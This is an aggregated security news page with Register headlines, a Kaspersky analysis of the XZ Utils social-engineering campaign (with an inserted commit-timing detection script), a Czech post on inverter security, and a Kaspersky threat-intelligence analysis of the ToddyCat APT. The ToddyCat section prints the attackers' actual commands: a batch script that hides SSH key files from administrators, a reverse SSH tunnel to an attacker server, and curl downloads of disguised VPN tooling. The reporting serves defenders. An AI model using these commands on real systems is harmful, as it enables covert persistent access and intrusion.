Viruses and Worms

Management company settles for $18.4M after nuclear weapons plant staff fudged their timesheets

The Register - Anti-Virus - 34 min 11 sec ago
The firm 'fessed up to staff misconduct and avoided criminal liability

A company contracted to manage an Amarillo, Texas nuclear weapons facility has to pay US government $18.4 million in a settlement over allegations that its atomic boffins fudged their timesheets to collect more money from Uncle Sam.…

Category: Viruses and Worms

Google cools on cookie phase-out while regulators chew on plans

The Register - Anti-Virus - 1 hour 2 min ago
Privacy Sandbox slips into 2025 after challenges from UK authorities

Google's plan to phase out third-party cookies in Chrome is being postponed to 2025 amid wrangling with the UK's Competition and Markets Authority (CMA) and Information Commissioner's Office (ICO).…

US charges Iranians with cyber snooping on government, companies

The Register - Anti-Virus - 1 hour 32 min ago
Their holiday options are now far more restricted

The US has charged and sanctioned four Iranian nationals for their alleged roles in various attacks on US companies and government departments, all of whom are claimed to have worked for fake companies linked to Iran's military.…

Assessing the Y, and How, of the XZ Utils incident

Kaspersky Securelist - 5 hours 23 min ago

High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up “out-of-band” interactions regarding underground rail system simulator software helped deliver Green Lambert implants in the Middle East. And, in what seems to be a learned approach, the XZ Utils project penetration was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed.

This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more-than-decade-old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive-use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.

While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM Solarwinds compromise and the SUNSPOT implant’s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it’s human involvement in the build process.

It’s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary’s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.

One of the best publicly available chronological timelines on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It’s highly recommended reading. Notably, Cox writes: “This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.”

A Singaporean guy, an Indian guy, and a German guy walk into a bar…

Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils developer mailing lists and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.

Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities’ communications. The “Jia Tan” identity seems a bit forced as well – the only public geolocation data is a Singaporean VPN exit node that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource.

Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a “jiat75” or “jiatan018” username for the “Jia Tan” Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the “JiaT75” actor.

One additional identity, Hans Jansen, introduced a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75’s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: “Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)”.

This pull request is the Jansen identity’s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a Debian bug report on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.

Jia Tan Identity and Activity

The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022.

  • oss-fuzz
  • cpp-docs
  • wasmtime
  • xz

These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.

The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 authored hundreds of changes for the XZ project.

Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias “Alden” posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.

The time differences for the malicious commits are noticeable. What might this anomaly suggest? We speculate on several possibilities:

  • the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.
  • the JiaT75 individual contributor was rushed to commit the malicious backdoor code.
  • the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.
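The work-hours anomaly described above can be checked mechanically against any contributor's commit history. The script below is an added example, not part of the Securelist post or the Huntress visualization it cites: it builds a profile of the hours a contributor usually commits at (on the clock recorded in the git author timestamp) and flags commits that fall outside that profile. The timestamps are constructed for illustration, not real XZ Utils history.

```python
from collections import Counter
from datetime import datetime

# Constructed sample data (not real XZ Utils history): a contributor whose
# established pattern is commits between roughly 09:00 and 18:00 on their own
# clock, followed by a short burst of candidate commits to be checked.
BASELINE_COMMITS = [
    "2023-03-06T09:12:00+08:00", "2023-03-07T10:45:00+08:00",
    "2023-03-11T14:03:00+08:00", "2023-03-12T16:30:00+08:00",  # weekend work too
    "2023-04-18T11:20:00+08:00", "2023-05-02T17:55:00+08:00",
    "2023-06-09T13:10:00+08:00", "2023-09-21T09:40:00+08:00",
    "2023-11-30T15:25:00+08:00", "2024-01-15T12:05:00+08:00",
]
CANDIDATE_COMMITS = [
    "2024-02-23T03:14:00+08:00",  # night-time on the author's own clock
    "2024-02-24T02:58:00+08:00",
    "2024-02-26T10:30:00+08:00",  # inside the usual window, should not flag
    "2024-03-08T04:41:00+08:00",
]


def local_hour(ts):
    """Hour of day in the zone recorded in the timestamp. git stores the
    author's own UTC offset, so this is the author's local clock, not UTC."""
    return datetime.fromisoformat(ts).hour


def working_hours_profile(commits, tolerance=1):
    """Set of 'usual' local hours: every hour seen in the baseline, widened by
    +/- `tolerance` hours so a commit just before 09:00 is not a false alarm."""
    seen = Counter(local_hour(t) for t in commits)
    usual = set()
    for hour in seen:
        for delta in range(-tolerance, tolerance + 1):
            usual.add((hour + delta) % 24)
    return usual


def hours_off_profile(hour, usual):
    """Distance in hours (around the 24h clock) to the nearest usual hour;
    0 means the commit is inside the profile."""
    return min(min((hour - u) % 24, (u - hour) % 24) for u in usual)


def flag_off_hours(baseline, candidates, tolerance=1):
    """Return (timestamp, distance) for each candidate commit that falls
    outside the contributor's established working-hours profile."""
    usual = working_hours_profile(baseline, tolerance)
    flagged = []
    for ts in candidates:
        dist = hours_off_profile(local_hour(ts), usual)
        if dist > 0:
            flagged.append((ts, dist))
    return flagged


if __name__ == "__main__":
    for ts, dist in flag_off_hours(BASELINE_COMMITS, CANDIDATE_COMMITS):
        print(f"{ts}  {dist}h outside the usual window")
```

A real run would feed `git log --format=%aI` output into `BASELINE_COMMITS` and treat the profile as one signal among several, since a genuine contributor also works odd hours occasionally.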

Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.

Summer 2022 Pressure to Add a Maintainer

Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.

Name | GitHub Account | Email | Creation
Jia Tan/Jia Cheong Tan | JiaT75 | [email protected] | January 26, 2021
Dennis Ens | – | [email protected] | –
Jigar Kumar | – | [email protected] | –

If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a superficial code patch on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project.

A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.

Wed, 27 Apr 2022 11:42:57 -0700 | Re: [xz-devel] [PATCH] String to filter and filter to string
“Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.”

Thu, 28 Apr 2022 10:10:48 -0700 | Re: [xz-devel] [PATCH] String to filter and filter to string
“Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There is no reason to think anything is coming soon.”

Fri, 27 May 2022 10:49:47 -0700 | Re: [xz-devel] [PATCH] String to filter and filter to string
“Over 1 month and no closer to being merged. Not a suprise.”

Tue, 07 Jun 2022 09:00:18 -0700 | Re: [xz-devel] XZ for Java
“Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.”

Tue, 14 Jun 2022 11:16:07 -0700 | Re: [xz-devel] XZ for Java
“With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?”

Wed, 22 Jun 2022 10:05:06 -0700 | Re: [xz-devel] [PATCH] String to filter and filter to string
“Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?”

The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: “Dennis you are better off waiting until new maintainer happens or fork yourself.”

Thu, 19 May 2022 12:26:03 -0700 | XZ for Java
“Is XZ for Java still maintained? I asked a question here a week ago and have not heard back. When I view the git log I can see it has not updated in over a year. I am looking for things like multithreaded encoding / decoding and a few updates that Brett Okken had submitted (but are still waiting for merge). Should I add these things to only my local version, or is there a plan for these things in the future?”

Tue, 21 Jun 2022 13:24:47 -0700 | Re: [xz-devel] XZ for Java
“I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C? Trying to maintain both means that neither are maintained well.”

Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:

  • In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.
  • In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.
  • In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.

Spring 2024 Pressure to Import Backdoored Code to Debian

Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a Debian report log on March 25, 2024 to raise urgency to include the backdoored code: “Dear mentors, I am looking for a sponsor for my package “xz-utils”.”

Name | Email address
Hans Jansen | [email protected]
krygorin4545 | [email protected]
– | [email protected]
– | [email protected]

The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:

Date: Tue, 26 Mar 2024 19:27:47 +0000
From: krygorin4545 <[email protected]>
Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression utilities
Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work

Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)
From: [email protected]
Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression
I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!

The code changes received pushback from Debian contributors:

Date: Tue, 26 Mar 2024 19:27:47 +0000
From: krygorin4545 <[email protected]>
Subject: new upstream versions as NMU vs. xz maintenance
Very much *not* a fan of NMUs doing large changes such as new upstream versions. But this does give us the question, what’s up with the maintenance of xz-utils? Same as with the lack of security uploads of git, which you also maintain, are you active? Are you well?

To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:

Date: Wed, 27 Mar 2024 12:46:32 +0000
From: krygorin4545 <[email protected]>
Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance
Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn’t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (). Fixing a valgrind break across many apps throughout Debian is the priority here.

What NeXZt?

Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at prior SAS events [registration required], distilling an assessment into a manageable table.

Unfortunately, we expect more open-source project incidents like the XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified similar social engineering-driven incidents in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.

If Britain is so bothered by China, why do these .gov.uk sites use Chinese ad brokers?

The Register - Anti-Virus - 8 hours 5 min ago
One wonders why are there adverts on public-sector portals at all

Exclusive: At least 18 public-sector websites in the UK and US send visitor data in some form to various web advertising brokers – including an ad-tech biz in China involved in past privacy controversies, a security firm claims.…

Mandiant: Orgs are detecting cybercriminals faster than ever

The Register - Anti-Virus - 23 April 2024 - 15:05
The 'big victory for the good guys' shouldn't be celebrated too much, though

The average time taken by global organizations to detect cyberattacks has dropped to its lowest-ever level of ten days, Mandiant revealed today.…

UnitedHealth admits IT security breach could 'cover substantial proportion of people in America'

The Register - Anti-Virus - 23 April 2024 - 14:30
That said, good ol' American healthcare system so elaborately costly, some are forced to avoid altogether

UnitedHealth Group, the parent of ransomware-struck Change Healthcare, delivered some very unwelcome news for customers today as it continues to recover from the massively expensive side and disruptive digital break-in.…

Leicester streetlights take ransomware attack personally, shine on 24/7

The Register - Anti-Virus - 23 April 2024 - 13:05
City council says it lost control after shutting down systems

It's become somewhat cliché in cybersecurity reporting to speculate whether an organization will have the resources to "keep the lights on" after an attack. But the opposite turns out to be true with Leicester City Council following its March ransomware incident.…

Over a million Neighbourhood Watch members exposed through web app bug

The Register - Anti-Virus - 23 April 2024 - 10:30
Unverified users could scoop up data on high-value individuals without any form of verification process

Neighbourhood Watch (NW) groups across the UK can now rest easy knowing the developers behind a communications platform fixed a web app bug that leaked their data en masse.…

Do you like Trojan horses? Get yourself Chinese photovoltaics!

VIRY.CZ - 23 April 2024 - 09:30

Recently I was struck by an interview with Radek Špicar, vice-president of the Confederation of Industry and Transport, who stated that “Chinese electric cars are not just competition steamrolling European carmakers, but also a possible security risk” and that this issue is hardly talked about. Ivo Zelinka then followed up on X with the post “Do you like Trojan horses? Then Chinese carmakers have great news for you: you can get such a horse cheaply.” I would take the liberty of following up with a far bigger problem that is also not talked about: Chinese photovoltaic systems on the roofs of family houses, for which you can moreover apply for subsidies such as „Zelená úsporám“…

China is a threat

That China is a threat can be read regularly in the reports of the BIS (the Czech counterintelligence service) or heard from the head of state. In practice, however, it has virtually no impact. Apparently everyone is waiting for the first “screw-up”. The huge share of Chinese photovoltaic systems is also helped by the fact that the number of European manufacturers of PV inverters can be counted on the fingers of one hand, even by someone who has lost a few of those fingers to a circular saw. If someone nevertheless picks from the European competition (beware of rebranded Chinese brands!), the price often puts them off. With panels the situation is even worse.

China is the leader

I myself have Chinese panels on the roof and a Chinese SOLAX-brand inverter in the basement. I don’t doubt its qualities, but my insight into IT security led me, even before installation, to decide that the first step after commissioning the plant would be to simply cut it off from the internet. It is absolutely typical for PV systems that they can be controlled and monitored via the cloud, i.e. from a mobile device or a web portal. In fact, often there is no other sensible option if you want to know at least something about your PV system. The manufacturer thus automatically collects a range of valuable information. I have no illusions that Western companies in other sectors don’t collect it too, but as a friend of mine says: “I’d rather be eavesdropped on from the West than from the East.”

Beyond that, though, we know that manufacturers often have more tools at their disposal than the owner of the photovoltaic system does. Specifically, with the SOLAX brand for example, technical support is able to upgrade the firmware of individual components for you over the internet. All you have to do is ask them by e-mail. If the owner tries to upgrade the firmware themselves, they will need a suitably prepared USB flash drive plugged into the inverter.

Taiwan

Let us pray that a conflict between the West and China, e.g. over Taiwan, never breaks out. If it escalated, at the very least what Mr Špicar warns about could happen. Plus, if Russia was able to blackmail us by switching gas off and on, which was unthinkable a few years ago, why couldn’t China blackmail us through smart IoT devices (including PV systems), when the overwhelming majority of them are of Chinese origin and all of Europe is riddled with them?

Bugs and the user

But back to a more positive reality. The “screw-up” can actually come by a far simpler route. Let us recall that the owner of a PV system may be exactly the same type of person who, for example, sells a pair of trousers for a few hundred crowns on Bazoš and gets robbed of 200 thousand in the process; it may also be the one who uses a single simple password for all services, or the one who has never heard of a term like “two-factor authentication” or 2FA (here it is worth noting that some inverter manufacturers don’t know 2FA either!!!). So we may soon see cases where someone simply takes control of someone else’s power plant and, at the very least, turns the owner’s lights off at home. Unintentional mistakes (or intentional ones stemming from sloppiness and ignorance) can, however, also be made by the inverter manufacturers themselves or by the makers of other smart IoT devices. Here are a few cases described directly on viry.cz:

https://viry.cz/zavirovani-automobilu-pres-internet/
https://viry.cz/hrozba-v-rozkroku/
https://viry.cz/kulma-na-vlasy-s-ovladanim-pres-mobil-je-tu/

What to do about it?

The simplest thing is to consider whether you really need to have a smart device reachable from the internet. Whether to leave the WiFi air purifier or WiFi washing machine really “dumb” and control it physically by simply walking up to it. The same goes for the photovoltaic inverter and other devices. If that isn’t possible, then the way is to operate these devices in an alternative way, one that the overwhelming majority of other users will not use. When the attacker’s moment comes, or the geopolitical situation leads to it, it is almost certain that the attack vector will be aimed so as to hit the largest possible group of users (that is, at the cloud infrastructure).

Through this “alternative” use you may paradoxically end up with far greater comfort in using these smart devices. If only because you don’t have to have 10 apps from every manufacturer on your phone, but one, usually a more “polished” one. But more about that next week, perhaps. In the top right you can subscribe so you don’t miss it.

An excerpt from the interview between Radek Špicar and Čestmír Strakatý can be found here:

“Chinese electric cars are not just competition steamrolling European carmakers, but also a possible security risk,” says Radek Špicar (@R_Spicar_SP_CR), vice-president of the Confederation of Industry and Transport, in the Crunch podcast with @cestmirstrakaty.

Full podcast: https://t.co/Sro6C4Wq7m pic.twitter.com/K0FTicBR1m

— CzechCrunch (@czechcrunch) April 18, 2024

Ivo Zelinka’s post is here:

Do you like horses?

Then Chinese carmakers have great news for you: you can get such a horse cheaply

That is, if you don’t mind that your new electric car is a Trojan horse…

Why are electric cars better for espionage than combustion cars? Answers close at 22:00. pic.twitter.com/G9reg8DP4C

— Ivo Zelinka (@IvoZelinka) April 21, 2024

The post “Do you like Trojan horses? Get yourself Chinese photovoltaics!” (Máte rádi trojské koně? Pořiďte si čínskou fotovoltaiku!) appeared first on VIRY.CZ.

Misconfigured cloud server leaked clues of North Korean animation scam

The Register - Anti-Virus - 23 April 2024 - 07:26
Outsourcers outsourced work for the BBC, Amazon, and HBO Max to the hermit kingdom

A misconfigured cloud server that used a North Korean IP address has led to the discovery that film production studios including the BBC, Amazon, and HBO Max could be inadvertently using workers from the hermit kingdom for animation projects.…

Old Windows print spooler bug is latest target of Russia's Fancy Bear gang

The Register - Anti-Virus - 23 April 2024 - 03:15
Putin's pals use 'GooseEgg' malware to launch attacks you can defeat with patches or deletion

Russian spies are exploiting a years-old Windows print spooler vulnerability and using a custom tool called GooseEgg to elevate privileges and steal credentials across compromised networks, according to Microsoft Threat Intelligence.…

FBI and friends get two more years of warrantless FISA Section 702 snooping

The Register - Anti-Virus - 22 April 2024 - 23:09
Senate kills reform amendments, Biden swiftly signs bill into law

US lawmakers on Saturday reauthorized a contentious warrantless surveillance tool for another two years — and added a whole bunch of people and organizations to the list of those who can be compelled to spy for Uncle Sam.…

Europol now latest cops to beg Big Tech to ditch E2EE

The Register - Anti-Virus - 22 April 2024 - 18:30
Don't bore us, get to the chorus: You need less privacy so we can protect the children

Yet another international cop shop has come out swinging against end-to-end encryption - this time it's Europol which is urging an end to implementation of the tech for fear police investigations will be hampered by protected DMs.…

Germany arrests trio accused of trying to smuggle naval military tech to China

The Register - Anti-Virus - 22 April 2024 - 17:30
Prosecutors believe one frikkin' laser did make its way to Beijing

Germany has arrested three citizens who allegedly tried to transfer military technology to China, a violation of the country's export rules.…

Watchdog tells Dutch govt: 'Do not use Facebook if there is uncertainty about privacy'

The Register - Anti-Virus - 22 April 2024 - 16:00
Meta insists it's just misunderstood and it's safe to talk to citizens over FB

The Dutch Data Protection Authority (AP) has warned that government organizations should not use Facebook to communicate with the country's citizens unless they can guarantee the privacy of data.…

US House passes fresh TikTok ban proposal to Senate

The Register - Anti-Virus - 22 April 2024 - 15:00
Sadly no push to end stupid TikTok dances, but ByteDance would have year to offload app stateside

Fresh US legislation to force the sale of TikTok locally was passed in Washington over the weekend after an earlier version stalled in the Senate.…

UK data watchdog questions how private Google's Privacy Sandbox is

The Register - Anti-Virus - 22 April 2024 - 13:13
Leaked draft report says stated goals still come up short

Google's Privacy Sandbox, which aspires to provide privacy-preserving ad targeting and analytics, still isn't sufficiently private.…

Has the ever-present cyber danger just got worse?

The Register - Anti-Virus - 22 April 2024 - 12:59
Facing down the triple threat of ransomware, data breaches and criminal extortion

Sponsored: On the face of it, there really isn't much of an upside for the current UK government after MPs described its response to attacks by cyber-espionage group APT31 as 'feeble, derisory and sadly insufficient.'…

ToddyCat is making holes in your infrastructure

Kaspersky Securelist - 22 April 2024 - 12:00

We continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for collecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.

ToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.

During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and ran all required tools with the help of PsExec or Impacket.

Tools for traffic tunneling

Having several tunnels to the infected infrastructure implemented with different tools allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.

Reverse SSH Tunnel

One way to gain access to remote network services is to create a reverse SSH tunnel.

Attackers use several files to launch a reverse SSH tunnel:

  1. The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it
  2. An OPENSSH private key file
  3. The “a.bat” script to hide the private key file

The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares).

The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.

C:\program files\OpenSSH\ssh.exe
C:\programdata\sshd\ssh.exe
C:\programdata\ssh\ssh.exe

The private key files required for establishing a connection to the remote server were copied to the following paths.

C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat

OpenSSH private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.

After the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat script. In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.

c:\users\public\a.bat

This file contains the following commands.

@echo off
::# Set Key File Variable:
Set Key="C:\Windows\AppReadiness"
takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
icacls "%Key%" >> "%temp%\a.txt"
::# Remove Variable:
set "Key="

In Windows, C:\Windows\AppReadiness is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.

The icacls command output for the AppReadiness folder with default values

The image above shows the default permissions for this folder:

  • Administrators and SYSTEM: full permissions
  • Authenticated Users: read-only permissions

This means that regular users can view the contents of the folder.

The a.bat script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for C:\Windows\AppReadiness after the script has run:

The icacls command output for the AppReadiness folder after a.bat script has executed

Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a “no permission” error.

Access denied error and Security tab for the AppReadiness folder

To start the tunnel, attackers create a scheduled task that runs the following command.

C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103[.]27.202.85 -p 22222 -fN

This command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as the user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.

In the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the server to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.

Each user is assigned to a different port on the infected host. For example, the user systemtest05 redirects traffic from the malicious server to port 445, normally used by SMB services.

The remote server IP information is shown in the table below.

IP: 103.27.202[.]85
Country + ASN: Thailand, AS58955
Net name: BANGMOD-VPS-NETWORK
Net Description: Bangmod VPS Network
Address: Bangmod-IDC Supermicro Thailand Powered by CSloxinfo
Email: [email protected]

The whole process of creating an SSH tunnel can be described with the diagram given below.

Diagram of SSH tunnel creation

SoftEther VPN

The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.

SoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

To launch the VPN server, the attackers used the following files:

  • vpnserver_x64.exe: a digitally signed VPN server executable
  • hamcore.se2: a container file that includes components required to run vpnserver_x64.exe
  • vpn_server.config: server configuration

In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.

In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system. The following names of, and paths to, this file are known:

c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo\kln.exe
c:\programdata\iobit\iobitrtt\tmp\mstime.exe
c:\perflogs\ecache\boot.exe
C:\users\public\music\wia.exe
c:\windows\debug\wia\wia.exe
c:\users\public\music\taskllst.exe
c:\programdata\lenovo\lenovo\main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe

You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.

The file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.

To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote resources using the curl utility (see below).

"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1

We observed the following remote resources being used as download sources.

URL | Original file name
hxxp://www.netportal.or[.]kr/common/css/main.js | vpnserver_x64.exe
hxxp://www.netportal.or[.]kr/common/css/ham.js | Hamcore.se2
hxxp://23.106.122[.]5/hamcore.se2 | Hamcore.se2
hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe | vpnserver_x64.exe
hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 | Hamcore.se2

In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then edited.

"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1
